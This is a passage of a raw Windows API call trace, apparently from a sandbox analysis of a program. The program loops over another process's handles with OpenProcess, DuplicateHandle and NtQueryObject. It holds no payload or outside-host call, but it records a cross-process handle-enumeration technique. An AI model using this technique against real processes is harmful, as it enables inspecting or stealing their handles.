ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.299] CloseHandle (hObject=0x1b8) returned 1 [0113.299] CloseHandle (hObject=0x198) returned 1 [0113.299] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.299] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x134, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.299] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.299] CloseHandle (hObject=0x1b8) returned 1 [0113.299] CloseHandle (hObject=0x198) returned 1 [0113.299] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.299] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x138, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.300] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.300] CloseHandle (hObject=0x1b8) returned 1 [0113.300] CloseHandle (hObject=0x198) returned 1 [0113.300] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.300] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.300] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.300] CloseHandle (hObject=0x1b8) returned 1 [0113.300] CloseHandle (hObject=0x198) returned 1 [0113.301] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.301] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x140, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.301] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.301] CloseHandle (hObject=0x1b8) returned 1 [0113.301] CloseHandle (hObject=0x198) returned 1 [0113.301] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.301] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x144, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.301] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.302] CloseHandle (hObject=0x1b8) returned 1 [0113.302] CloseHandle (hObject=0x198) returned 1 [0113.302] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.302] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x148, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.302] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.302] CloseHandle (hObject=0x1b8) returned 1 [0113.302] CloseHandle (hObject=0x198) returned 1 [0113.302] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.303] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.303] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.303] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.303] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.303] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.303] CloseHandle (hObject=0x1b8) returned 1 [0113.303] CloseHandle (hObject=0x198) returned 1 [0113.303] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.303] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x150, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.306] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.306] CloseHandle (hObject=0x1b8) returned 1 [0113.306] CloseHandle (hObject=0x198) returned 1 [0113.306] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.306] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x154, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.307] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.307] CloseHandle (hObject=0x1b8) returned 1 [0113.307] CloseHandle (hObject=0x198) returned 1 [0113.307] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.307] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x158, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.307] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.307] CloseHandle (hObject=0x1b8) returned 1 [0113.307] CloseHandle (hObject=0x198) returned 1 [0113.308] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.308] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.308] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.308] CloseHandle (hObject=0x1b8) returned 1 [0113.308] CloseHandle (hObject=0x198) returned 1 [0113.308] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.308] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x160, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.308] CloseHandle (hObject=0x198) returned 1 [0113.308] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.309] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x164, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.309] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.309] CloseHandle (hObject=0x1b8) returned 1 [0113.309] CloseHandle (hObject=0x198) returned 1 [0113.309] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.309] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x168, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.309] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.310] CloseHandle (hObject=0x1b8) returned 1 [0113.310] CloseHandle (hObject=0x198) returned 1 [0113.310] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.310] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.310] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.310] CloseHandle (hObject=0x1b8) returned 1 [0113.310] CloseHandle (hObject=0x198) returned 1 [0113.310] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.310] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.311] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.311] CloseHandle (hObject=0x1b8) returned 1 [0113.311] CloseHandle (hObject=0x198) returned 1 [0113.311] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.311] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x174, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.311] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.312] CloseHandle (hObject=0x1b8) returned 1 [0113.312] CloseHandle (hObject=0x198) returned 1 [0113.312] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.312] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x178, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.312] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.312] CloseHandle (hObject=0x1b8) returned 1 [0113.313] CloseHandle (hObject=0x198) returned 1 [0113.313] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.313] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.313] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.313] CloseHandle (hObject=0x1b8) returned 1 [0113.314] CloseHandle (hObject=0x198) returned 1 [0113.314] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.314] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x180, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.314] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.314] CloseHandle (hObject=0x1b8) returned 1 [0113.314] CloseHandle (hObject=0x198) returned 1 [0113.314] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.314] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x184, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.315] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.315] CloseHandle (hObject=0x1b8) returned 1 [0113.315] CloseHandle (hObject=0x198) returned 1 [0113.315] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.315] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x188, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.315] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.315] CloseHandle (hObject=0x1b8) returned 1 [0113.315] CloseHandle (hObject=0x198) returned 1 [0113.315] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.316] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.316] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.316] CloseHandle (hObject=0x1b8) returned 1 [0113.316] CloseHandle (hObject=0x198) returned 1 [0113.316] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.316] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x190, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.316] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.316] CloseHandle (hObject=0x1b8) returned 1 [0113.317] CloseHandle (hObject=0x198) returned 1 [0113.317] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.317] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x194, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.317] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.317] CloseHandle (hObject=0x1b8) returned 1 [0113.317] CloseHandle (hObject=0x198) returned 1 [0113.317] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.317] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x198, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.317] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.318] CloseHandle (hObject=0x1b8) returned 1 [0113.318] CloseHandle (hObject=0x198) returned 1 [0113.318] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.318] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.318] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.318] CloseHandle (hObject=0x1b8) returned 1 [0113.318] CloseHandle (hObject=0x198) returned 1 [0113.318] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.319] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.319] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.319] CloseHandle (hObject=0x1b8) returned 1 [0113.319] CloseHandle (hObject=0x198) returned 1 [0113.319] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.319] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.319] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.319] CloseHandle (hObject=0x1b8) returned 1 [0113.320] CloseHandle (hObject=0x198) returned 1 [0113.320] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.320] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.320] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.320] CloseHandle (hObject=0x1b8) returned 1 [0113.320] CloseHandle (hObject=0x198) returned 1 [0113.320] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.320] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.320] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.321] CloseHandle (hObject=0x1b8) returned 1 [0113.321] CloseHandle (hObject=0x198) returned 1 [0113.321] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.321] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.321] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.321] CloseHandle (hObject=0x1b8) returned 1 [0113.321] CloseHandle (hObject=0x198) returned 1 [0113.322] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.322] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.322] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.322] CloseHandle (hObject=0x1b8) returned 1 [0113.322] CloseHandle (hObject=0x198) returned 1 [0113.322] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.322] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.323] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.323] CloseHandle (hObject=0x1b8) returned 1 [0113.323] CloseHandle (hObject=0x198) returned 1 [0113.323] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.323] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.323] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.323] CloseHandle (hObject=0x1b8) returned 1 [0113.323] CloseHandle (hObject=0x198) returned 1 [0113.324] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.324] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.324] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.324] CloseHandle (hObject=0x1b8) returned 1 [0113.324] CloseHandle (hObject=0x198) returned 1 [0113.324] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.324] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.324] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.325] CloseHandle (hObject=0x1b8) returned 1 [0113.325] CloseHandle (hObject=0x198) returned 1 [0113.325] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.325] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.325] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.325] CloseHandle (hObject=0x1b8) returned 1 [0113.325] CloseHandle (hObject=0x198) returned 1 [0113.325] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.326] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.326] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.326] CloseHandle (hObject=0x1b8) returned 1 [0113.326] CloseHandle (hObject=0x198) returned 1 [0113.326] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.326] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.326] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: 